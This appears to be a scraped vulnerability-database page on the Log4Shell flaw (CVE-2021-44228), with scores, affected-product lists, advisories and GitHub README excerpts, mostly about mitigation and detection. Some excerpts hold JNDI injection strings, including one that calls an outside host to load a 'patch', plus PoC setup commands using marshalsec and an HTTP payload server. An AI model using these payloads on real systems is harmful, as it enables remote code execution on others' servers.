10
CVSSv3

CVE-2021-44228

Published: 10/12/2021 Updated: 05/05/2022
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Most Upvoted Vulmon Research Post

There is no Researcher post for this vulnerability
Would you like to share something about it? Sign up now to share your knowledge with the community.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache log4j 2.0

apache log4j

siemens sppa-t3000_ses3000_firmware

siemens logo\\! soft comfort

siemens spectrum power 4 4.70

siemens spectrum power 4

siemens siveillance control pro

siemens energyip prepay 3.7

siemens energyip prepay 3.8

siemens siveillance identity 1.6

siemens siveillance identity 1.5

siemens siveillance command

siemens sipass integrated 2.85

siemens sipass integrated 2.80

siemens head-end system universal device integration system

siemens gma-manager

siemens energyip 8.5

siemens energyip 8.6

siemens energyip 8.7

siemens energyip 9.0

siemens energy engage 3.1

siemens e-car operation center

siemens desigo cc info center 5.0

siemens desigo cc info center 5.1

siemens desigo cc advanced reports 4.1

siemens desigo cc advanced reports 4.2

siemens desigo cc advanced reports 5.0

siemens desigo cc advanced reports 5.1

siemens desigo cc advanced reports 4.0

siemens comos

siemens captial 2019.1

siemens navigator

siemens xpedition package integrator -

siemens xpedition enterprise -

siemens vesys 2019.1

siemens vesys

siemens teamcenter

siemens spectrum power 7 2.30

siemens spectrum power 7

siemens solid edge harness design 2020

siemens solid edge harness design

siemens solid edge cam pro

siemens siveillance viewpoint

siemens siveillance vantage

siemens siguard dsa 4.3

siemens siguard dsa 4.4

siemens siguard dsa 4.2

siemens captial

siemens industrial edge management

siemens industrial edge management hub

siemens mendix

siemens mindsphere

siemens nx

siemens opcenter intelligence

siemens operation scheduler

siemens sentron powermanager 4.1

siemens sentron powermanager 4.2

intel audio development kit -

intel system debugger -

intel secure device onboard -

intel oneapi sample browser -

intel sensor solution firmware development kit -

intel computer vision annotation tool -

intel genomics kernel library -

intel system studio -

intel data center manager -

debian debian linux 9.0

debian debian linux 10.0

debian debian linux 11.0

fedoraproject fedora 34

fedoraproject fedora 35

sonicwall email security

netapp oncommand insight -

netapp cloud insights -

netapp active iq unified manager -

netapp cloud manager -

netapp cloud secure agent -

netapp ontap tools -

netapp snapcenter -

cisco unified communications manager im and presence service 11.5\\(1\\)

cisco unified customer voice portal 11.6

cisco webex meetings server

cisco packaged contact center enterprise 11.6\\(1\\)

cisco webex meetings server 3.0

cisco identity services engine

cisco data center network manager

cisco data center network manager 11.3\\(1\\)

cisco finesse

cisco finesse 12.6\\(1\\)

cisco identity services engine 2.4.0

cisco intersight virtual appliance

cisco iot operations dashboard -

cisco network services orchestrator

cisco nexus dashboard

cisco unified contact center express

cisco webex meetings server 4.0

cisco advanced malware protection virtual private cloud appliance

cisco automated subsea tuning

cisco business process automation

cisco cloudcenter

cisco cloudcenter cost optimizer

cisco cloudcenter suite admin

cisco cloudcenter workload manager

cisco common services platform collector

cisco crosswork data gateway

cisco crosswork data gateway 3.0.0

cisco crosswork network controller

cisco crosswork network controller 3.0.0

cisco crosswork optimization engine

cisco crosswork optimization engine 3.0.0

cisco crosswork platform infrastructure

cisco crosswork platform infrastructure 4.1.0

cisco crosswork zero touch provisioning

cisco crosswork zero touch provisioning 3.0.0

cisco customer experience cloud agent

cisco cyber vision sensor management extension

cisco dna center

cisco dna spaces\\ _connector

cisco evolved programmable network manager

cisco fog director -

cisco integrated management controller supervisor

cisco nexus insights

cisco optical network controller

cisco sd-wan vmanage

cisco ucs central

cisco ucs director

cisco virtualized infrastructure manager

cisco wan automation engine

cisco workload optimization manager

cisco connected mobile experiences -

cisco network assurance engine

cisco prime service catalog

cisco smart phy

cisco unified contact center enterprise

cisco unified contact center enterprise 11.6\\(2\\)

cisco unified customer voice portal

cisco unified customer voice portal 12.0

cisco unified customer voice portal 12.5

cisco unity connection

cisco video surveillance operations manager

cisco virtual topology system

cisco virtualized voice browser

cisco unified intelligence center

cisco unified sip proxy

cisco unified workforce optimization

cisco broadworks

cisco cloud connect

cisco contact center domain manager

cisco contact center management portal

cisco emergency responder

cisco enterprise chat and email

cisco packaged contact center enterprise

cisco paging server

cisco unified communications manager

cisco unified communications manager 11.5\\(1\\)

cisco unified communications manager 11.5\\(1\\)su3

cisco unified communications manager im and presence service

cisco fxos 7.0.0

cisco fxos 6.7.0

cisco fxos 6.6.0

cisco fxos 6.5.0

cisco fxos 6.4.0

cisco fxos 6.3.0

cisco fxos 6.2.3

cisco fxos 7.1.0

cisco prime service catalog 12.1

cisco firepower threat defense 6.2.3

cisco firepower threat defense 6.4.0

cisco firepower threat defense 6.3.0

cisco unity connection 11.5

cisco firepower threat defense 6.5.0

cisco firepower threat defense 6.6.0

cisco sd-wan vmanage 20.3

cisco cyber vision sensor management extension 4.0.2

cisco dna spaces connector -

cisco sd-wan vmanage 20.5

cisco sd-wan vmanage 20.6

cisco unified communications manager im \\& presence service 11.5\\(1.22900.6\\)

cisco unified contact center express 12.5\\(1\\)

cisco unified customer voice portal 11.6\\(1\\)

cisco unified customer voice portal 12.0\\(1\\)

cisco unified customer voice portal 12.5\\(1\\)

cisco unified customer voice portal 12.6\\(1\\)

cisco unified intelligence center 12.6\\(1\\)

cisco unified intelligence center 12.6\\(2\\)

cisco unified sip proxy 010.000\\(000\\)

cisco unified sip proxy 010.000\\(001\\)

cisco unified sip proxy 010.002\\(000\\)

cisco unified sip proxy 010.002\\(001\\)

cisco broadworks -

cisco emergency responder 11.5

cisco emergency responder 11.5\\(4.65000.14\\)

cisco emergency responder 11.5\\(4.66000.14\\)

cisco enterprise chat and email 12.0\\(1\\)

cisco enterprise chat and email 12.5\\(1\\)

cisco enterprise chat and email 12.6\\(1\\)

cisco finesse 12.5\\(1\\)

cisco paging server 8.3\\(1\\)

cisco paging server 8.4\\(1\\)

cisco paging server 8.5\\(1\\)

cisco paging server 9.0\\(1\\)

cisco paging server 9.0\\(2\\)

cisco paging server 9.1\\(1\\)

cisco paging server 12.5\\(2\\)

cisco paging server 14.0\\(1\\)

cisco ucs central software 2.0\\(1f\\)

cisco ucs central software 2.0\\(1g\\)

cisco ucs central software 2.0\\(1h\\)

cisco ucs central software 2.0\\(1k\\)

cisco ucs central software 2.0\\(1l\\)

cisco unified communications manager 11.5\\(1.17900.52\\)

cisco unified communications manager 11.5\\(1.18119.2\\)

cisco unified communications manager 11.5\\(1.18900.97\\)

cisco unified communications manager 11.5\\(1.21900.40\\)

cisco unified communications manager 11.5\\(1.22900.28\\)

cisco unified communications manager im \\& presence service 11.5\\(1\\)

cisco unified computing system 006.008\\(001.000\\)

cisco unified contact center enterprise 12.0\\(1\\)

cisco unified contact center enterprise 12.5\\(1\\)

cisco unified contact center enterprise 12.6\\(1\\)

cisco unified contact center enterprise 12.6\\(2\\)

cisco unified contact center express 12.6\\(1\\)

cisco unified contact center express 12.6\\(2\\)

cisco unified contact center management portal 12.6\\(1\\)

cisco automated subsea tuning 02.01.00

cisco cloudcenter suite 4.10\\(0.15\\)

cisco cloudcenter suite 5.3\\(0\\)

cisco cloudcenter suite 5.4\\(1\\)

cisco cloudcenter suite 5.5\\(0\\)

cisco cloudcenter suite 5.5\\(1\\)

cisco connected analytics for network deployment 007.001.000

cisco connected analytics for network deployment 007.002.000

cisco connected analytics for network deployment 7.3

cisco connected analytics for network deployment 007.003.000

cisco connected analytics for network deployment 007.003.001.001

cisco connected analytics for network deployment 007.003.003

cisco connected analytics for network deployment 008.000.000

cisco connected analytics for network deployment 008.000.000.000.004

cisco cx cloud agent 001.012

cisco cyber vision 4.0.2

cisco dna center 2.2.2.8

cisco dna spaces -

cisco evolved programmable network manager 3.0

cisco evolved programmable network manager 3.1

cisco evolved programmable network manager 4.0

cisco evolved programmable network manager 4.1

cisco evolved programmable network manager 5.0

cisco evolved programmable network manager 5.1

cisco firepower threat defense 6.7.0

cisco firepower threat defense 7.0.0

cisco firepower threat defense 7.1.0

cisco identity services engine 002.004\\(000.914\\)

cisco identity services engine 002.006\\(000.156\\)

cisco identity services engine 002.007\\(000.356\\)

cisco identity services engine 003.000\\(000.458\\)

cisco identity services engine 003.001\\(000.518\\)

cisco identity services engine 003.002\\(000.116\\)

cisco integrated management controller supervisor 002.003\\(002.000\\)

cisco integrated management controller supervisor 2.3.2.0

cisco intersight virtual appliance 1.0.9-343

cisco mobility services engine -

cisco network assurance engine 6.0\\(2.1912\\)

cisco network dashboard fabric controller 11.0\\(1\\)

cisco network dashboard fabric controller 11.1\\(1\\)

cisco network dashboard fabric controller 11.2\\(1\\)

cisco network dashboard fabric controller 11.3\\(1\\)

cisco network dashboard fabric controller 11.4\\(1\\)

cisco network dashboard fabric controller 11.5\\(1\\)

cisco network dashboard fabric controller 11.5\\(2\\)

cisco network dashboard fabric controller 11.5\\(3\\)

cisco network insights for data center 6.0\\(2.1914\\)

cisco network services orchestrator -

cisco optical network controller 1.1

cisco sd-wan vmanage 20.4

cisco sd-wan vmanage 20.6.1

cisco sd-wan vmanage 20.7

cisco sd-wan vmanage 20.8

cisco smart phy 3.1.2

cisco smart phy 3.1.3

cisco smart phy 3.1.4

cisco smart phy 3.1.5

cisco smart phy 3.2.1

cisco smart phy 21.3

cisco ucs central software 2.0

cisco ucs central software 2.0\\(1a\\)

cisco ucs central software 2.0\\(1b\\)

cisco ucs central software 2.0\\(1c\\)

cisco ucs central software 2.0\\(1d\\)

cisco ucs central software 2.0\\(1e\\)

cisco unified workforce optimization 11.5\\(1\\)

cisco unity connection 11.5\\(1.10000.6\\)

cisco video surveillance manager 7.14\\(1.26\\)

cisco video surveillance manager 7.14\\(2.26\\)

cisco video surveillance manager 7.14\\(3.025\\)

cisco video surveillance manager 7.14\\(4.018\\)

cisco virtual topology system 2.6.6

cisco wan automation engine 7.1.3

cisco wan automation engine 7.2.1

cisco wan automation engine 7.2.2

cisco wan automation engine 7.2.3

cisco wan automation engine 7.3

cisco wan automation engine 7.4

cisco wan automation engine 7.5

cisco wan automation engine 7.6

cisco common services platform collector 002.009\\(000.000\\)

cisco common services platform collector 002.009\\(000.001\\)

cisco common services platform collector 002.009\\(000.002\\)

cisco common services platform collector 002.009\\(001.000\\)

cisco common services platform collector 002.009\\(001.001\\)

cisco common services platform collector 002.009\\(001.002\\)

cisco common services platform collector 002.010\\(000.000\\)

cisco connected analytics for network deployment 006.004.000.003

cisco connected analytics for network deployment 006.005.000.

cisco connected analytics for network deployment 006.005.000.000

cisco connected analytics for network deployment 007.000.001

cisco crosswork network automation -

cisco crosswork network automation 2.0.0

cisco crosswork network automation 3.0.0

cisco crosswork network automation 4.1.0

cisco crosswork network automation 4.1.1

snowsoftware vm access proxy

snowsoftware snow commander

bentley synchro 4d

bentley synchro

Vendor Advisories

Debian Bug report logs - #1001478 apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Fri, 10 Dec ...
Debian Bug report logs - #1001729 apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default configurations Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianor ...
Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular Logging Framework for Java JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message pa ...
It was found that the fix to address CVE-2021-44228 in Apache Log4j, a Logging Framework for Java, was incomplete in certain non-default configurations This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:l ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 200 and before and including 2141 which could allow a remote attacker to execute code on the server if the system logs an attacker controlled string value with the attacker's JNDI LDAP server lookup The highest threat from the vulnerability is to data confidentiality ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
Apache Log4j2 <=2141 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled From log4j 2 ...
Synopsis Critical: Red Hat Process Automation Manager 7120 security update Type/Severity Security Advisory: Critical Topic An update is now available for Red Hat Process Automation ManagerRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base score, which gi ...
Amazon Kinesis Agent versions within Amazon Linux 2 (AL2) prior to aws-kinesis-agent-204-1 included a version of Apache Log4j affected by CVE-2021-44228 and CVE-2021-45046 The Amazon Kinesis Agent has been updated to aws-kinesis-agent-204-1 within Amazon Linux 2 that mitigates CVE-2021-44228 and CVE-2021-45046 For additional detail see https: ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...

ICS Advisories

Mailing Lists

Apache Log4j2 versions 2141 and below information disclosure exploit ...
This Metasploit module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload The Automatic target delivers a Java payload using remote class loading This requires Metasploit to run an HTTP server in addition to the LDAP server that the ta ...
Apache Log4j2 versions 20-beta-9 and 2141 remote code execution exploit ...
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows This Metasploit ...
Severity: moderate (CVSS: 37 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2150 was incomplete in certain non-default configurations This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Patte ...
Description: JMSAppender in Log4j 12 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashi ...

Github Repositories

Log4J-Mitigation-CVE-2021-44228 Background: Internet discussion was abuzz about a 0-day vulnerability (one that can yield remote code execution) in Apache’s popular Log4J logging library for Java This particular vulnerability–tracked as CVE-2021-44228 with the maximum “critical” CVSS score of 10–resides in Log4J’s lookup capability, combined

About A playground for poking at the Log4Shell (CVE-2021-44228) vulnerability mitigations This particular problem lies within the JndiLookup feature and the log4j ability to interpret ALL the arguments of a logging call I would expect it to only interpret the message pattern (the first argument of a logging call), eg, the Hello {} in loginfo("Hello {}", "${j

Did someone say gist? A fail2ban filter for the Log4J CVE-2021-44228 exploit More here: jaygoobyorg/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228 Find interesting referers in accesslog Unknown host - removes the offending line from ~/ssh/known_hosts More here: jaygoobyorg/2021/02/10/unknown-host Generates an nginx map file so you can use the correct

Running Spring Boot app on Kubernetes This project describes how to run Spring Boot app on Kubernetes You don't actually need to rewrite your app in order to target a K8s cluster: Spring Boot can run on many platforms, thanks to the abstraction level it provides This app is made of a single REST controller: @RestController class HelloController { @Value("${appm

F5 Professional Services Solutions, tools and examples developed by the F5 Professional Services team Examples The examples folder has common examples and solutions for different products of the F5 portfolio Use them as a reference for your own or extend them for a particular use case Example Description ansible-playbooks This contains sample ansible playbooks as3-d

CVE-2021-44228: log4j / log4shell Security Research Summary This repository contains all gathered resources we used during our Incident Reponse on CVE-2021-44228 aka log4shell Threat Intel URL Info musananet/2021/12/13/log4shell-Quick-Guide/ log4shell-Quick-Guide cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2021-44228 MITRE CVE-2021-44228 www

CVE-2021-44228 A Zeek package which raises notices and optionally generates a log for Log4J (CVE-2021-44228) attempts Installation $ zkg install cve-2021-44228 Use against a pcap you already have: $ zeek -Cr scripts/__load__zeek yourpcap Options and notes: Option CVE_2021_44228::log determines if the log4j log is generated Defaults to T Example Notice #separator \x09 #set_

test-44228 A simple example for CVE-2021-44228 Implements two java CLIs, one using log4j v1x, the other using log4j 2x to demonstrate the log4shell vulnerability See also: wwwlunasecio/docs/blog/log4j-zero-day/ wwworaclecom/security-alerts/alert-cve-2021-44228html Usage Vulnerable Log4J2 Start a listener on some server (localhost or remote), eg: $

CVE-2021-44228 Helpers Helpers, examples, and exploits for cve-2021-44228 Helpers Echo chamber cd echochamber Logs input via log4j Build: /gradlew build Run: /gradlew run --console=plain Ldap Exfil Server cd ldap-listener Ldap server that logs requests to allow for exfiltration Build: pip install -r requirementstxt Run: python3 listenerpy <port> Vulnerable ap

Log4Shell-IOCs Members of the Curated Intelligence Trust Group have compiled a list of IOC feeds and threat reports focused on the recent Log4Shell exploit targeting CVE-2021-44228 in Log4j Indicators of Compromise (IOCs) Source URL GreyNoise (1) gistgithubcom/gnremy/c546c7911d5f876f263309d7161a7217 GreyNoise (2) gistgithubcom/nathanqthai/01808c5699

Vendor App Source Broadcom CA Advanced Authentication supportbroadcomcom/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerability/SYMSA19793 Broadcom CA Risk Authentication supportbroadcomcom/security-advisory/content/security-advisories/Symantec-Security-Advisory-for-Log4j-2-CVE-2021-44228-Vulnerabili

cve-2021-44228-qingteng-online-patch What is this Fix CVE-2021-44228 using the vulnerability itself How to use Inject the following code to anywhere likely vulnerable to CVE-2021-44228 ${jndi:ldaps://cve-2021-44228qingtengcn:8443/patch} and the vulnerability will get fixed, or run your own server using binaries from releases

SitecoreSolr-log4j-mitigation CVE-2021-44228 This repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228 by applying the advice as documented on solrapacheorg/securityhtml#apache-solr-affected-by-apache-log4j-cve-2021-44228 The PowerShell script assumes that you have used the default root path when installing Sitecore with

trivy-cve-scan Scan multiple Docker images with Trivy for a specific CVE Usage example # thanks to mediumcom/linkbynet/cve-2021-44228-finding-log4j-vulnerable-k8s-pods-with-bash-trivy-caa10905744d kubectl get pods -o jsonpath='{range items[*]}{speccontainers[*]image}{" "}' | tr " " "\n" | sort -u > imagestxt /trivy_

Log4j | CVE-2021-44228 | IOCs List Log4j IP List 458364237 9222389187 458367157 4583668 5121017524 517516178 18522010162 139177178141 458366111 942325177 5121017587 68183198247 18510756121 147182154110 1851008741 61175202154 621128132 45836494 1097010028 21217517038 458367228 1168918919 13868155222 45836520

KPACK Awesome Demo Setup kpack is the Kubernetes implementation of the pack, the cloud native buildpack technologie used before pre-requisite: install kpack on your Kubernetes cluster or run make kpack Shared resources edit kpack/shared/kpack_valuesyaml corresponding with your environment registry (url / username) and run: AWESOMEDEMO_registry_password=password-to-get-access

CVE-2021-44228 checker This is the repository for checking for vulnerability CVE-2021-44228 How it works? Step 1: Run the server application The image ghcrio/greymd/cve-2021-44228/server is available and can be run on Docker $ docker run -p 1389:1389 -t ghcrio/greymd/cve-2021-44228/server Step 2: Access the endpoint with log4j Prepare

log4j-vulnerable-app-cve-2021-44228-terraform A Terraform to deploy vulnerable app and a JDNIExploit to work with CVE-2021-44228

LOG4 CVE-2021-44228 IOC A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilises the Java logging

Log4Shell This repo contains code to demonstrate how the remote code execution vulnerability in log4j works Read more here: wwwlunasecio/docs/blog/log4j-zero-day/ and here nvdnistgov/vuln/detail/CVE-2021-44228 How it works DoJndiLookup executes the following statement: LOGGERinfo("${jndi:ldap://localhost/cn=log4shell,dc=example,dc=com}");

Log4j-CVE-2021-44228 detector scanner playbook Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script for Log4Shell (CVE-2021-44228) Red Hat detector The result is saved in a txt file under detector_dir (default: /tmp/cve-2021-44228/) How to run Default variables scan all the /var/ path for affected files Customize the varsyml file f

check-log4j This tool will try to determine if the host it is running on is likely vulnerable to the latest reason that the internet is on fire: the log4j RCE CVE‐2021‐44228 This is different from other tools that attempt to verify whether a specific service is vulnerable by triggering the exploit and eg, tracking pingbacks on a DNS canary token That approach tells you

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks The remote exploit app in this demo is based on that found at githubcom/kozmer/log4j-shell-poc This demo tomcat server (Tomcat 853, Java 180u51) has been r

CVE-2021-44228(Apache Log4j Remote Code Execution) all log4j-core versions >=20-beta9 and <=2141 The version of 1x have other vulnerabilities, we recommend that you update the latest version Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228) Usage: git clone githubcom/tangxiaofeng7/apache-log4j-pocgit cd apache-log4j-poc/src/ma

ServiceNow MID Server This is the full collection of all Service-Now MID Server versions as Docker container A note on Apache Log4j Vulnerability (CVE-2021-44228) According to KB1000959 the MID servers are not affected by this vulnerability However, as the MID Server does contain the files for log4j 2140, theoretically the vulnerability is still present Therefore the Jndi

log4shell-example This pieces together a few things across github/internet and makes understanding why the log4shell is so dangerous Built/tested rootless containers with podman and docker using x86_64 images An example tomcat java application that uses log4j and has a login screen to illustrate how easy it is to input exploitable ldap references An LDAP server that will ser

Node Security Shield A Developer and Security Engineer friendly package for Securing NodeJS Applications Inspired by the log4J vulnerability (CVE-2021-44228) which can be exploited because an application can make arbitrary network calls We felt there is an need for an application to declare what privileges it can have so that exploitation of such vulnerabilities becomes harde

log4j-aws-appenders Appenders for Log4J 1x, Log4J 2x and Logback that write to various AWS destinations: CloudWatch Logs: AWS-native centralized log management, providing keyword and time range search Kinesis Streams: the first step in a logging pipeline that feeds Elasticsearch and other analytics destinations SNS: useful for real-time error notifications In addition to

Log4jPatch This is a POC of a simple tool which injects a Java agent into a running JVM process The agent will patch the lookup() method of all loaded orgapachelogginglog4jcorelookupJndiLookup instances to unconditionally return the string "Patched JndiLookup::lookup()" This should fix the CVE-2021-44228 remote code execution vulnerability in Log4j without res

Log4j2-CVE-2021-44228 Remote Code Injection In Log4j

CVE-2021-44228 PoC 環境 Java 11 Maven LDAPサーバの準備 git clone githubcom/mbechler/marshalsecgit cd marshalsec/ mvn clean package -DskipTests java -cp target/marshalsec-*-SNAPSHOT-alljar marshalsecjndiLDAPRefServer localhost:8000/#Command 9999 Java側の準備 以下のようにして localhost:8000/Co

CVE-2021-44228-Test-Server A small server for verifing if a given java program is succeptibel to CVE-2021-44228 Usage Build the program using go build -o listenerexe This should give you a small executable for your platform Use the Go cross compile feature if you need the executable for another platform Once you have the executable you can run it using: $ listener

Spigot Log4J Patch Mojang was logging the commant chat message as "format" not an "argument" to be replaced by the "format" Which allowed the advisory an access to the JdniLookup to initiate the remote code injection attack Exploiting the JDNI Reference attack has been known before But, the MinecraftServer#sendMessage allowed the attacker an acc

Critical Version Enforcer This mod simple enforce a specific version of Minecraft Forge to make sure security related versions are installed Note: If your Minecraft Forge is crashing because of this mod, please update to a newer version! Version History 118 118-38017: CVE-2021-44228 1171 1171-3711: CVE-2021-44228 1165 1165-36220: CVE-2021-44228

Log4jNuclei CVE-2021-44228 Log4j for nuclei

CVE-2021-44228 This repository contains a set of YARA rules for detecting versions of log4j which are vulnerable to CVE-2021-44228 by looking for the signature of JndiManager prior to 2150 Although there is a number of resources available for detecting insecure use of log4j using CodeQL or Semgrep, there have not yet been any resources made available for detection of potenti

CVE-2021-44228(Apache Log4j Remote Code Execution) Affected versions < 2150 Useage: git clone githubcom/tangxiaofeng7/apache-log4j-pocgit cd apache-log4j-poc/src/main/java javac Exploitjava python -m SimpleHTTPServer 8888 cd tools java -cp marshalsec-003-SNAPSHOT-alljar marshalsecjndiLDAPRefServer "http

Log4Shell sample vulnerable application (CVE-2021-44228) This is an almost copy/similar vulnerable application to githubcom/christophetd/log4shell-vulnerable-app The main differences are maven instead of gradle, and the usage of rogue-jndi This repository contains a maven Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 26

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs search for malicious strings decode payloads print results to stdout or file report ips (incl logs) to AbuseIPDB Scanning Directory: python3 jndiReppy -d /path/to/directory File: python3 jndiReppy -f /path/to/inputtxt Custom filter: python3 jndiReppy -g "ldap" Threading: If scanning a direc

A sample code of Log4j Security Vulnerabilities by githubcom/xinyuz Description from Apache Fixed in Log4j 2150 CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints Severity: Critical Base CVSS Score: 100 CVSS:30/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H Versions Affected: all versions from 20-beta

J4Ndiss JNDI Exploit Server for exploiting #log4shell (CVE-2021-44228) To start the server, customize the port exposure within the command $ docker build -t jandis $ docker run --rm -it -p 8088:8088 -p 3789:3789 --name jndi jandis

Exploit number - CVE-2021-44228 Exploit info topics: wwwopennetru/opennews/artshtml?num=56319 wwwlunasecio/docs/blog/log4j-zero-day/ Exploit: githubcom/tangxiaofeng7/apache-log4j-poc About utility: A simple console utility that removes the vulnerable line from log4j2 How to use: To use the utility, open it as an executable file Then, in the consol

log4shell-mitigation Mitigation for Log4Shell Security Vulnerability CVE-2021-44228

log4j-patcher Java Agent that disables Apache Log4J's JNDI Lookup This is for CVE-2021-44228 If you can, use the latest available version of Log4J, as this was fixed in Log4J 2150 Otherwise, download the log4j-patcher JAR and follow the steps below How to Use To use Java Agents, you specify them with the -javaagent JVM argument Example: java -jar -javaagent:path/to/M

CVE-2021-44228 こっちのお話の方がより実用性があると思います(泣)christophetd/log4shell-vulnerable-app 興味を持って勢いで調べただけなので、あやふやな箇所や間違いがあると思われます。 どうか、自己責任でお願いします。 再現環境を作る。 linux環境であれば動作すると思われます。 1 jd

log4shell This is a proof of concept for the Log4Shell bug Info githubcom/mbechler/marshalsec githubcom/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce wwwlunasecio/docs/blog/log4j-zero-day/ Use as tester Because the application logs the LDAP path this implementation can be used in combination with scanning alle your service endpoints J

Log4Shell-Detection Change Log 20211211u1: Creation Tenable blog wwwtenablecom/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability Identify Log4j installs without running a new scan Log4Shell plugins 155998 - Apache Log4j Message Lookup Substitution RCE (Log4Shell) (Direct Check) See note regarding this plugin below 1

log4j CVE-2021-44228 Public IoCs list Public IoCs about log4j CVE-2021-44228 based on Twitter and others social networks (pull requests accepted) IPs 45155205233 1712519325 1712519377 1712519320 1712519378 185220100242 1827197252 89234182139 18522010139 104244796

javalogslulz java am i right? what's this? this makes it easier to test if an application is vulnerable to the log4j2 vulnerability (CVE-2021-44228) this is free, so dont ruin it, read license in LICENSE

log4j PowerShell Checker CVE-2021-44228 Perform a scan of a single host (using Powershell) to see if it's vulnerable for the above-mentioned CVE Extras: added outgoing proxy support Usage Run it like this: \log4j_ps_checkerps1 vulnerableserver:8443 Setting up a NameServer Create a new (A) subdomain record for your domain, like log4jcheckexamplecom; and Poi

f5-waf-enforce-sigs-CVE-2021-44228 This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device Overview This script enforces all signatures present in the list below related to CVE-2021-44228 across all policies in blocking mode in the Adv WAF/ASM sigs = ['200104768', '200104769', '200004450', '200004451',

log4shell-detector Playbook This simple Ansible Playbook can be used to clone and execute the log4shell-detector pyhon script to detect CVE-2021-44228 exploit attempts in your infrastructure The playbook will save the findings for each host under reports/{hostname} How to Clone the repository git clone githubcom/kaipee/log4shell-detector-playbookgit

Log4Shell_CVE-2021-44228_related_attacks_IOCs

ftb-infinity - latest Feed The Beast Infinity Evolved modpack made by Feed The Beast at feed-the-beastcom Modpack for Minecraft 1710 with Log4j CVE-2021-44228 vulnerability mitigation Infinity Evolved is the general all-purpose pack from the FTB team that is designed for solo play as well as small and medium population servers The pack for all people Fastcraft is

log4j---CVE-2021-44228 On December 5, 2021, Apache identified a vulnerability (later identified as CVE-2021-44228) in their widely used Log4j logging service The vulnerability, also known as Log4shell, enables attackers to gain full control of affected servers by allowing unauthenticated remote code execution if the user is running an application utilizing the Java logging lib

CVE-2021-44228(Apache Log4j Remote Code Execution) Affected versions < 2150 Usage: git clone githubcom/tangxiaofeng7/apache-log4j-pocgit cd apache-log4j-poc/src/main/java javac Exploitjava python -m SimpleHTTPServer 8888 cd tools java -cp marshalsec-003-SNAPSHOT-alljar marshalsecjndiLDAPRefServer "http:

log4j-poc Poc of log4j2 (CVE-2021-44228)

